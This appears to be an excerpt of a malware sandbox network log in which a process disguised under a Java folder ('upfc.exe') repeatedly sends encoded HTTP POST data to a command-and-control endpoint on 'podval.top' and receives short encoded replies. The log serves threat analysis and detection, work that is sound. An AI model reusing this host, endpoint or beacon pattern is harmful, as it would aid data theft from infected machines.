                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4465e79c3ff-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    15          192.168.2.10  49732        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:22.332765102 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:22.682444096 CEST  1060               OUT        Data Raw: 5f 53 5a 5b 5e 5d 57 5a 58 56 55 51 50 5b 59 52 55 5f 5e 5e 51 58 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _SZ[^]WZXVUQP[YRU_^^QXS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[&98')$ )-!=>-Y'C"'#,>?7;,"['$Y -
                                                    Jul 3, 2024 16:42:22.794450045 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:23.141895056 CEST  577                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8n%2BeURfTyvwXiToKk9JdicPvJlPmY24iN1Mj%2BM0XK%2FVaWo7zuLTSJe9OXF9XNaAIhIGzl5OvNaJ4ZHFENowPDNUFpAY02ssGNPd5rz4%2FACYRyHBasZXuyI6UuODY"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a44c2b890cbc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:42:23.230195999 CEST  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    16          192.168.2.10  49733        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:23.222450018 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:23.572700977 CEST  1772               OUT        Data Raw: 5f 55 5f 5d 5e 5a 57 50 58 56 55 51 50 5e 59 56 55 50 5e 58 51 5d 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_]^ZWPXVUQP^YVUP^XQ]SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[%_0C0 08>>) ":>.0%$R->?""<Z,<"['$Y
                                                    Jul 3, 2024 16:42:23.689896107 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:24.117372990 CEST  727                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uZdWRs19mXO%2Feh8xVar6rE1um0q0xQC3pvb7W4D3lu6tmLYCQGNEiyuyfiqb8rStYp1dfLPI6nK3VSDFRgvzASM7zwuCDV7ssd6jrIXcKy6JVl3b8HL6%2BCsSKfNB"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a451ae1180d6-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 14 31 03 2d 11 31 32 2b 52 2e 13 02 0e 2b 04 34 59 3b 5f 39 14 3c 0a 26 03 3a 10 03 09 20 14 3e 5b 28 3c 2c 58 25 23 20 1c 22 0b 20 5b 04 1c 23 5b 3c 5c 2d 58 29 3b 33 52 24 3c 3d 0b 27 19 25 11 27 38 32 56 24 06 38 05 28 3b 29 56 30 0b 3f 59 3e 28 32 5b 3c 09 39 07 21 24 21 54 02 13 22 1c 33 04 29 1c 23 30 3f 1e 27 33 3e 01 33 24 06 0d 33 1d 35 0b 29 33 36 55 24 57 37 04 21 3f 2f 52 24 38 3e 5a 30 13 2e 00 23 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%1-12+R.+4Y;_9<&: >[(<,X%# " [#[<\-X);3R$<='%'82V$8(;)V0?Y>(2[<9!$!T"3)#0?'3>3$35)36U$W7!?/R$8>Z0.#(#_+)V3YT0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    17          192.168.2.10  49734        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:23.367151022 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:23.713455915 CEST  1060               OUT        Data Raw: 5a 56 5f 5a 5b 59 52 5a 58 56 55 51 50 5f 59 53 55 5c 5e 58 51 5b 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZV_Z[YRZXVUQP_YSU\^XQ[SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X2:,@0#]' ]>=)R4*--5\$-Z$,-+X718[/,"['$Y =
                                                    Jul 3, 2024 16:42:23.825880051 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:24.172522068 CEST  578                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M27iI7JL4M8elboS6IXjZwpuE3A9pJopptXdM2NsJnToKpDMF2wOTbVwgRKu2eKCEqlOjy%2BazL1M%2FHqUwF0lJH4JfaNqp6xu2zaCORaDStLZXhCSW0hkQRPh4x9v"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a452afc08cca-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    18          192.168.2.10  49735        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:24.298254967 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:24.650808096 CEST  1060               OUT        Data Raw: 5f 50 5a 58 5b 5a 57 51 58 56 55 51 50 58 59 56 55 51 5e 5f 51 58 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _PZX[ZWQXVUQPXYVUQ^_QXS^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&?'*#^'3#^)>!R4.%[.5]3&:'#'U8-# ";/,"['$Y !
                                                    Jul 3, 2024 16:42:24.753422022 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:24.970609903 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:25.093204975 CEST  584                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=euyZeTh3xtAu%2FZCaba8Zohsebc8gtUUoLwZKsfAY08k7G6JybdbBpnReH6dn1gqnQX9ODNER%2FBordHudXN%2BII6N8FSBNnZuSPjKurNbioMP%2FS7WuHIc%2F4ehhIfcq"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a45868230f78-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    19          192.168.2.10  49736        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:25.259377003 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:25.604111910 CEST  1060               OUT        Data Raw: 5f 54 5f 5e 5b 5e 57 5f 58 56 55 51 50 5a 59 54 55 5c 5e 5c 51 59 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_^[^W_XVUQPZYTU\^\QYS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!1:3'7]'0;=>1U --*3650/.<"" /"['$Y )
                                                    Jul 3, 2024 16:42:25.777451038 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:26.057024002 CEST  578                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ALb71SXPcsPS41%2FWoh7udoy9drnOVoiB1cMxPGWmepozpUB8nukQ4cQLC5gCff%2FN4TAGAKdWOhKfjKmqRjNMspVQnhrN8vVLqime5MhgmXEgyuRlc8fp6IEqMcmF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a45e598a18b4-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    20          192.168.2.10  49737        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:26.187046051 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:26.541495085 CEST  1060               OUT        Data Raw: 5a 50 5f 55 5e 5c 52 58 58 56 55 51 50 5d 59 5b 55 5f 5e 5d 51 59 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZP_U^\RXXVUQP]Y[U_^]QYS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%$0'0# =-T#!Y..Z'&9X$7-.7_8"['$Y 5
                                                    Jul 3, 2024 16:42:26.682478905 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:27.008877993 CEST  580                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gEPqcusRksK4KMDbJp6Zo0P0%2BcHm6e%2BRd1bLCjIquV3A7kNAarY%2FKaegJYLocjTpCXg6se1IrPwDAseMbhNhYJos3fDWTVP8uGP8OCK7QT2IK4CxGp37yLFYZgtx"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4646f350c7e-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    21          192.168.2.10  49738        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:27.140454054 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:27.496376038 CEST  1060               OUT        Data Raw: 5f 53 5a 5f 5b 58 57 5c 58 56 55 51 50 5c 59 52 55 5d 5e 5b 51 5a 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _SZ_[XW\XVUQP\YRU]^[QZSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\&)$($#;\=.%7%-)[$&90#?V/X(""/<"['$Y 1
                                                    Jul 3, 2024 16:42:27.590604067 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:27.935386896 CEST  576                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XIRWzQ9Sh588M2s8vdi1n7ZmsQkMTro55%2FJHWPFs065DtJswCJALTtP8lUt1K5MEdqwMvZMSK1EV8pBkN9RVxtv0SJK1ctDbRKoI7NI8IpKX8KtoThnSotGywtZh"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a46a2f5619a1-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    22 | 192.168.2.10 | 49739 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:28.064877033 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:28.416408062 CEST | 1060 | OUT | Data Raw: 5a 51 5a 58 5e 5b 52 5c 58 56 55 51 50 5c 59 54 55 51 5e 5b 51 5f 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZQZX^[R\XVUQP\YTUQ^[Q_SYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[&:8E0:?_03?=>"7=*9.*3&=%# /=?X 2^/"['$Y 1
                                                    Jul 3, 2024 16:42:28.518400908 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:28.853379965 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YpUSSeGYuR9r%2BPGwOtEVE04PnISm3CrsKtpYKmmGGRoL6dQtKNPRy1iBghlkoSxDO8J2NI9SCViRjwZfRX2IYmg1cufmwrA0a57UWAgGnAT5R01R%2BmpEipeFEsG0"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a46ffef00f7d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    23 | 192.168.2.10 | 49740 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:29.008456945 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    24 | 192.168.2.10 | 49741 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:29.166922092 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:29.525845051 CEST | 1748 | OUT | Data Raw: 5a 52 5f 5d 5e 5a 52 5f 58 56 55 51 50 51 59 50 55 51 5e 5e 51 5f 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_]^ZR_XVUQPQYPUQ^^Q_S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"20@$*;X$[*=%T4:.>='&=]$3U8+X7 ^/"['$Y
                                                    Jul 3, 2024 16:42:29.605021000 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:29.959417105 CEST | 731 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2BkzOhN2KoLji%2Fnf8RJKB5fH%2B9SXjt2txWahPImRt8NqFR5NgWshoe4zStFlgK6MfO6E5OYi9u3yTa3g7iAi124yz7KopydIxS3JmMDZfycfOVR9qiZN%2BiTSlHEH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a476b81e1801-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 04 26 29 29 58 26 22 20 0c 39 03 3b 1a 3c 3e 28 1b 3b 5f 35 5f 3f 34 36 05 2e 00 2e 53 34 5c 35 02 3f 05 2f 07 26 20 01 09 21 1b 20 5b 04 1c 23 5c 3e 29 21 5a 28 16 05 52 26 3f 2e 1a 30 34 3e 05 33 2b 26 11 27 5e 28 05 3c 38 35 51 27 22 3b 58 3d 06 07 01 3f 34 31 02 36 34 21 54 02 13 22 57 30 2d 3d 55 23 33 3f 57 26 1e 1c 07 30 27 2f 54 24 20 29 0c 2a 0a 25 0a 24 08 3c 5c 35 11 24 0a 33 06 00 15 30 3e 22 02 22 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&))X&" 9;<>(;_5_?46..S4\5?/& ! [#\>)!Z(R&?.04>3+&'^(<85Q'";X=?4164!T"W0-=U#3?W&0'/T$ )*%$<\5$30>""#_+)V3YT0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    25 | 192.168.2.10 | 49742 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:29.356059074 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:29.713443995 CEST | 1060 | OUT | Data Raw: 5f 53 5f 5b 5b 5b 52 5f 58 56 55 51 50 5b 59 51 55 5c 5e 5f 51 55 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_[[[R_XVUQP[YQU\^_QUS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\&9&)/\'37*.49Z,>5[35)0#,.Y42+/,"['$Y -
                                                    Jul 3, 2024 16:42:29.813816071 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:30.150537014 CEST | 576 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
